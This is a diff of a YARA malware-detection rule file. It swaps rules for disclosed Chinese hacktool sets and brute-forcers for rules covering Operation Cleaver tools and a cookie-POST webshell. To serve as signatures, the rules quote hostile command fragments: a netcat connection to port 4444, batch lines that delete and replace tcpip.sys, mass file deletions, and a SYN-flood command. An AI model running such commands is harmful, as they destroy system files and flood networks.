-		id = "b9693f51-26ac-5bf1-8c4d-ca852a154636"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1231-L1246"
+		description = "Detects webshell using cookie POST"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cc5ded80-5e58-5b25-86d1-1c492042c740"
+		date = "2023-01-28"
+		modified = "2023-04-05"
+		reference = "https://github.com/SigmaHQ/Detection-Rule-License/blob/main/LICENSE.Detection.Rules.md"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6867-L6893"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
-		logic_hash = "e0ab572fe9009ddc39f34302d8a16531c23f51ce4ea373d57a039f22ccc934c7"
-		score = 60
+		hash = "d08a00e56feb78b7f6599bad6b9b1d8626ce9a6ea1dfdc038358f4c74e6f65c9"
+		hash = "2ce5c4d31682a5a59b665905a6f698c280451117e4aa3aee11523472688edb31"
+		hash = "ff732d91a93dfd1612aed24bbb4d13edb0ab224d874f622943aaeeed4356c662"
+		hash = "a3b64e9e065602d2863fcab641c75f5d8ec67c8632db0f78ca33ded0f4cea257"
+		hash = "d41abce305b0dc9bd3a9feb0b6b35e8e39db9e75efb055d0b1205a9f0c89128e"
+		hash = "333560bdc876fb0186fae97a58c27dd68123be875d510f46098fc5a61615f124"
+		hash = "2efdb79cdde9396ff3dd567db8876607577718db692adf641f595626ef64d3a4"
+		hash = "e1bd3be0cf525a0d61bf8c18e3ffaf3330c1c27c861aede486fd0f1b6930f69a"
+		hash = "f8cdedd21b2cc29497896ec5b6e5863cd67cc1a798d929fd32cdbb654a69168a"
+		logic_hash = "87229859ca3ee8f8b79360603c421528cda2ecefcc46d4080236d09b2dd510fb"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$bat = "@echo off" fullword ascii
-		$s0 = "cs.exe %1" fullword ascii
-		$s2 = "nc %1 4444" fullword ascii
+		$s1 = "]($_COOKIE, $_POST) as $"
+		$s2 = "function"
+		$s3 = "Array"
 
 	condition:
-		uint32( 0 ) == 0x68636540 and $bat at 0 and all of ( $s* )
+		( uint16( 0 ) == 0x3f3c and filesize < 100KB and ( all of them ) )
 }
-rule SIGNATURE_BASE_Hacktools_CN_GOGOGO_Bat
+rule SIGNATURE_BASE_OPCLEAVER_Backdoorlogger
 {
 	meta:
-		description = "Disclosed hacktool set - file GOGOGO.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b52cc150-81d4-5895-8f83-ee2006f75617"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1248-L1273"
+		description = "Keylogger used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "e9149baa-83c0-597f-833c-ea0241bb60e6"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L3-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
-		logic_hash = "0209ffba87ff07379c768c1c00496a37f0f9bc6b786a31afdafe55d65a9f39ab"
-		score = 60
+		logic_hash = "c7716b21e85d7e9fb1e1503071c6cd7dc2f4713051e0b03013e3d123a0d800a6"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
-		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
-		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
-		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
-		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
-		$s6 = "del /f tcpip.sys" fullword ascii
-		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
-		$s10 = "call scan.bat" fullword ascii
-		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
-		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
-		$s18 = "sc config LmHosts start= auto" fullword ascii
-		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
-		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
+		$s1 = "BackDoorLogger"
+		$s2 = "zhuAddress"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Pass
+rule SIGNATURE_BASE_OPCLEAVER_Jasus
 {
 	meta:
-		description = "Disclosed hacktool set - file pass.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d8f6784f-80c8-51e2-9d86-40022cd8705d"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1275-L1298"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "55a05cf93dbd274355d798534be471dff26803f9"
-		logic_hash = "3a30cc602a66bd87304756311d56e7c698c1edb0b4b209198c589c4792776992"
-		score = 60
-		quality = 60
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "123456.com" fullword ascii
-		$s1 = "123123.com" fullword ascii
-		$s2 = "360.com" fullword ascii
-		$s3 = "123.com" fullword ascii
-		$s4 = "juso.com" fullword ascii
-		$s5 = "sina.com" fullword ascii
-		$s7 = "changeme" fullword ascii
-		$s8 = "master" fullword ascii
-		$s9 = "google.com" fullword ascii
-		$s10 = "chinanet" fullword ascii
-		$s12 = "lionking" fullword ascii
+		description = "ARP cache poisoner used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "8e04b258-e071-5974-9778-b9d0b97be8d5"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L19-L34"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "7d6cd7f0f264a0bfdc6af422baa1a0e257cb8f4c39a2cb27a1edaf70201e8564"
+		score = 70
+		quality = 85
+		tags = ""
+
+	strings:
+		$s1 = "pcap_dump_open"
+		$s2 = "Resolving IPs to poison..."
+		$s3 = "WARNNING: Gateway IP can not be found"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Johor_Posts_Killer
+rule SIGNATURE_BASE_OPCLEAVER_Loggermodule
 {
 	meta:
-		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "68bba78e-f3a0-5eaa-9c63-e5f23a76b328"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1300-L1321"
+		description = "Keylogger used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "949e7ff4-2102-5c89-83c9-f7ba64745661"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L36-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
-		logic_hash = "2fc63cd42619a2b92ab8670b14ab4c01eb3b194cd337d329ba224b7088d26318"
-		score = 60
+		logic_hash = "dd937bc3fc7054874a3c61bbef859dd8a8ec37872a30be6d3e1776957f98db80"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Multithreading Posts_Send Killer" fullword ascii
-		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
-		$s6 = "The program's need files was not exist!" fullword ascii
-		$s7 = "JoHor_Posts_Killer" fullword wide
-		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
-		$s10 = "  ( /s ) :" fullword ascii
-		$s11 = "forms.vbp" fullword ascii
-		$s12 = "forms.vcp" fullword ascii
-		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
+		$s1 = "%s-%02d%02d%02d%02d%02d.r"
+		$s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
 
 	condition:
-		5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_Tesksd
+rule SIGNATURE_BASE_OPCLEAVER_Netc
 {
 	meta:
-		description = "Disclosed hacktool set - file tesksd.jpg"
-		author = "Florian Roth (Nextron Systems)"
-		id = "399ff307-c2e8-57bb-b792-a2c599e8686e"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1323-L1338"
+		description = "Net Crawler used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "68f32662-0d7d-5dfa-8bfd-ca41d383e19c"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L52-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
-		logic_hash = "dc81acef0ad3e6307f68ee755e5b27f2dcf1e2822e560a72dc5ae572703f4459"
-		score = 60
+		logic_hash = "7da739c33da91f07e9e35ceab88a37477372998b4cf4b692b8d26cd1a4d936de"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
-		$s1 = "ExeMiniDownload.exe" fullword wide
-		$s16 = "POST %Hs" fullword ascii
+		$s1 = "NetC.exe" wide
+		$s2 = "Net Service"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Http : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Shellcreator2
 {
 	meta:
-		description = "Disclosed hacktool set - file Http.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bbff6ff6-8cef-5a83-afd3-34f306e8e715"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1340-L1356"
+		description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
+		author = "Cylance Inc."
+		id = "b62336c3-39e5-55f8-98df-6c2a2cb0764a"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L68-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
-		logic_hash = "690b41bdf856e0d4d90b4a42524134302e9649018fdd495c359582aa6121a017"
-		score = 60
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "5422cf4e4809c1183c3c9870d9a5ddcf806082d8cae81a014255f5f18576101d"
+		score = 70
+		quality = 85
+		tags = ""
 
 	strings:
-		$s0 = "RPCRT4.DLL" fullword ascii
-		$s1 = "WNetAddConnection2A" fullword ascii
-		$s2 = "NdrPointerBufferSize" fullword ascii
-		$s3 = "_controlfp" fullword ascii
+		$s1 = "ShellCreator2.Properties"
+		$s2 = "set_IV"
 
 	condition:
-		all of them and filesize < 10KB
+		all of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Start
+rule SIGNATURE_BASE_OPCLEAVER_Smartcopy2
 {
 	meta:
-		description = "Disclosed hacktool set - file Start.bat - DoS tool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1291fbc5-fbb3-5425-bb9a-e45f4d7cf562"
-		date = "2014-11-17"
-		modified = "2023-01-27"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1358-L1380"
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "898d9060-208a-5dfb-a452-50ab49b80a9d"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L84-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
-		logic_hash = "b435957150da7b790809d2cf90a01c967127c183ddcbf333beda1a7c599b69a5"
-		score = 60
+		logic_hash = "5b83588fa80558cd387511d38e9d1c51c488216b9cd27e848d8bdc59cd8ce348"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" ascii
-		$s1 = "Blast.bat /r 600" fullword ascii
-		$s2 = "Blast.bat /l Blast.bat" fullword ascii
-		$s3 = "Blast.bat /c 600" fullword ascii
-		$s4 = "start Clear.bat" fullword ascii
-		$s5 = "del Result.txt" fullword ascii
-		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
-		$s7 = "start Thecard.bat" fullword ascii
-		$s10 = "setlocal enabledelayedexpansion" fullword ascii
+		$s1 = "SmartCopy2.Properties"
+		$s2 = "ZhuFrameWork"
 
 	condition:
-		5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_Tasksvr
+rule SIGNATURE_BASE_OPCLEAVER_Synflooder
 {
 	meta:
-		description = "Disclosed hacktool set - file tasksvr.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5c85b382-551a-5e9e-9af8-d106cbe26f74"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1382-L1397"
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "bdaf02f4-1226-569b-9f55-999be7ff397a"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L100-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
-		logic_hash = "183708e525ec6676662b59a2a3c79f5113a80f2d5b3bd4713c74a536fe303b2d"
-		score = 60
+		logic_hash = "b5349931c4eb5733f9bf05e7cfac6a434063a01d802665f70384cb29d9ae2a3d"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Consys21.dll" fullword ascii
-		$s4 = "360EntCall.exe" fullword wide
-		$s15 = "Beijing1" fullword ascii
+		$s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+		$s2 = "s IP is : %s"
+		$s3 = "Raw TCP Socket Created successfully."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Clear
+rule SIGNATURE_BASE_OPCLEAVER_Tinyzbot
 {
 	meta:
-		description = "Disclosed hacktool set - file Clear.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21f33a36-779e-5eac-819c-ef79f291b43c"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1398-L1419"
+		description = "Tiny Bot used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "4fad21a6-a900-5afb-876d-99a6d93e0c2c"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L117-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
-		logic_hash = "d10ed2c6ea3f1a8b289529cc90f50f84288003576aced903f48db3c2abc4722d"
-		score = 60
+		logic_hash = "fdc41fbec71602e13105a03a4f44319a139018bda00e87e8f4d9b5e2f6269c14"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
-		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
-		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
-		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
-		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
-		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
-		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
-		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
-		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
+		$s1 = "NetScp" wide
+		$s2 = "TinyZBot.Properties.Resources.resources"
+		$s3 = "Aoao WaterMark"
+		$s4 = "Run_a_exe"
+		$s5 = "netscp.exe"
+		$s6 = "get_MainModule_WebReference_DefaultWS"
+		$s7 = "remove_CheckFileMD5Completed"
+		$s8 = "http://tempuri.org/"
+		$s9 = "Zhoupin_Cleaver"
 
 	condition:
-		5 of them
+		(( $s1 and $s2 ) or ( $s3 and $s4 and $s5 ) or ( $s6 and $s7 and $s8 ) or $s9 )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Thecard
+rule SIGNATURE_BASE_OPCLEAVER_Zhoupinexploitcrew
 {
 	meta:
-		description = "Disclosed hacktool set - file Thecard.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a9946aeb-2042-522f-8d91-f8b96341bb64"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1421-L1438"
+		description = "Keywords used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "4e7457a0-e6e1-535c-b04b-ad313b496ce1"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L140-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
-		logic_hash = "29e1fb2e0bfa60e5406f9fd1c0ec99f0fc1b416ffc4d59846627e40959a32c63"
-		score = 60
+		logic_hash = "1541f1ebc026d3eaf9b62150085415d12523ee1395fb8cf7ade8608a1b0a11b6"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
-		$s1 = "Http://www.coffeewl.com" fullword ascii
-		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
-		$s3 = "for /L %%a in (" ascii
-		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
+		$s1 = "zhoupin exploit crew" nocase
+		$s2 = "zhopin exploit crew" nocase
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Blast
+rule SIGNATURE_BASE_OPCLEAVER_Antivirusdetector
 {
 	meta:
-		description = "Disclosed hacktool set - file Blast.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9ac723c4-e88d-5fb3-b18f-c8b764c8acf3"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1440-L1454"
+		description = "Hack tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "25ab4eaf-eae7-5a55-bed4-42f621d5f06c"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L156-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b07702a381fa2eaee40b96ae2443918209674051"
-		logic_hash = "77902c7b23bab80d035f1dbe074554f16f99b2c9e31c80171296a1d33f705dac"
-		score = 60
+		logic_hash = "9a8c2bbd27efab4c5579ea143abbd2f71c477dfd0ddbfb1741359e4d34140d9b"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
-		$s1 = "@echo off" fullword ascii
+		$s1 = "getShadyProcess"
+		$s2 = "getSystemAntiviruses"
+		$s3 = "AntiVirusDetector"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Vubrute_Vubrute
+rule SIGNATURE_BASE_OPCLEAVER_Csext
 {
 	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ac74c85-465c-5eb5-8e91-004f28cabb75"
-		date = "2014-11-22"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1456-L1472"
+		description = "Backdoor used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "f865eae5-9988-5533-a004-e1694761a557"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L173-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
-		logic_hash = "9dab03b70b249c0c481e3bc98c3196e83da93ea2723674d38baf32469392d52a"
+		logic_hash = "b4d070b71b685608ab84e757d01293749f2c017a6cd5b6ade6591264adc9836b"
 		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
-		$s1 = "http://ubrute.com" fullword ascii
-		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
-		$s14 = "error.txt" fullword ascii
+		$s1 = "COM+ System Extentions"
+		$s2 = "csext.exe"
+		$s3 = "COM_Extentions_bin"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_DK_Brute
+rule SIGNATURE_BASE_OPCLEAVER_Kagent
 {
 	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c9ea0dcf-10f3-5161-aebc-2db04c24b0a5"
-		date = "2014-11-22"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/xiIphp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1474-L1491"
+		description = "Backdoor used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "32d20495-eeed-5b2b-915d-cad60fa991f6"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L190-L204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
-		logic_hash = "a48ba3513c9c99066e9dda02859089e9e1db15e7bd52443795771609f011c94a"
+		logic_hash = "bd72ade7d40db830dc980def5107261f9cb41b713f9a0a1b2f41f7658b31653e"
 		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "get_CrackedCredentials" fullword ascii
-		$s13 = "Same port used for two different protocols:" fullword wide
-		$s18 = "coded by fLaSh" fullword ascii
-		$s19 = "get_grbToolsScaningCracking" fullword ascii
+		$s1 = "kill command is in last machine, going back"
+		$s2 = "message data length in B64: %d Bytes"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Vubrute_Config
+rule SIGNATURE_BASE_OPCLEAVER_Mimikatzwrapper
 {
 	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
-		author = "Florian Roth (Nextron Systems)"
-		id = "25cad108-b2d6-5886-bb2f-e614e05649fa"
-		date = "2014-11-22"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/xiIphp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1493-L1513"
+		description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "e9427e29-e581-5a5b-8f1d-4b9bfeec0946"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L206-L220"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
-		logic_hash = "b4c54d5ecb269c7310b5bd2a9e8fe5d6c75503f8cb1f25679399e25185d9cb51"
+		logic_hash = "c643e248a9d8dd653ec99f8b59cdc7af945857a6a0321f93cc6983e85f84baba"
 		score = 70
 		quality = 85
 		tags = ""
